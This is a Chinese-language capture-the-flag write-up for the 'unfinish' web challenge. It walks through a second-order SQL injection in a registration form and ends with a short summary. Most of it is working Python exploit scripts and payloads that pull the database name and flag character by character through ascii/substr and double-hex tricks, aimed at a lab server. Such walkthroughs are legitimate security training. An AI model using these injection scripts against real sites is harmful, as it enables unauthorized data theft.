攻防世界Web:unfinish

2024-02-17 19:17:04

打开页面后,是一个登录页面:
攻防世界Web:unfinish
用御剑扫一扫,发现有注册页面:
攻防世界Web:unfinish用burpsuite抓注册页面:
攻防世界Web:unfinish尝试构造sql盲注语句:username=1' and left(database(),1)>'a'#
得到结果为nnnnoooo!!!过滤了很多
通过抓包出来的三个参数,猜测注册的语句是:insert into tables value('$email','$username','$passwpord');
登录成功后语句:SELECT * FROM tables WHERE email = ''$email";
构造payload注入:0'+ascii(substr((select database() from 1 for 1))+'0
攻防世界Web:unfinish
但失败了,通过fuzz检测出这里过滤了很多,没办法了,去看了其他师傅们的wp,直接上获取数据库和flag的脚本吧:
获取数据库名web:

import requests
import re as r

re = requests.session()
url = 'http://111.200.241.244:63436/'

def register(email,username):
    url1 = url+'register.php'
    data = dict(email=email,username=username,password='123456')
    html = re.post(url=url1,data=data)
    html.encoding = 'utf-8'
    return html
def login(email):
    url2 = url+'login.php'
    data = dict(email=email,password='123456')
    html = re.post(url=url2,data=data)
    html.encoding = 'utf-8'
    return html

db = ''
table = ''
for i in range(1,10):         #取数据库名
    pyload = "0'+ascii(substr((select database()) from %d for 1))+'0"%i
    email = "111@qq.com"+str(i)
    html = register(email,pyload)
    html = login(email)
    match = r.search(r'<span class="user-name">\s*(\d*)\s*</span>',html.text)
    asc = match.group(1)
    if asc == '0':
        break
    db = db + chr(int(asc))
print('database:',db)

攻防世界Web:unfinish

对于表名为flag,师傅们说都是猜测的:

import requests
import re

register_url = 'http://111.200.241.244:63436/register.php'
login_url = 'http://111.200.241.244:63436/login.php'

for i in range(1, 100):
    register_data = {
        'email': '111@qq.com%d' % i,
        'username': "0' + ascii(substr((select * from flag) from %d for 1)) + '0" % i,
        'password': '123456'
    }
    res = requests.post(url=register_url, data=register_data)

    login_data = {
        'email': '111@qq.com%d' % i,
        'password': '123456'
    }
    res_ = requests.post(url=login_url, data=login_data)
    code = re.search(r'<span class="user-name">\s*(\d*)\s*</span>', res_.text)
    print(chr(int(code.group(1))), end='')

攻防世界Web:unfinish这里flag解析出来有点问题,但{{}}内的是正确的。

还有另外一种payload可以测试出,只不过也要上脚本,这里就简单提一提吧:
payload:0'%2B(select hex(hex(database())))%2B'0
得到的结果再两次解码:

"373736353632".decode('hex').decode('hex')
'web'

flag:0'%2B(select substr(hex(hex((select * from flag))) from 1 for 10))%2B'0
可以得到前两位是fl

对于ascii的以及这里的两次hex加密可以看看下面这个链接:
unfinish

总结:
ascii、hex的sql注入利用

上一篇:004、


下一篇:vue-hr-my(day01)===login页面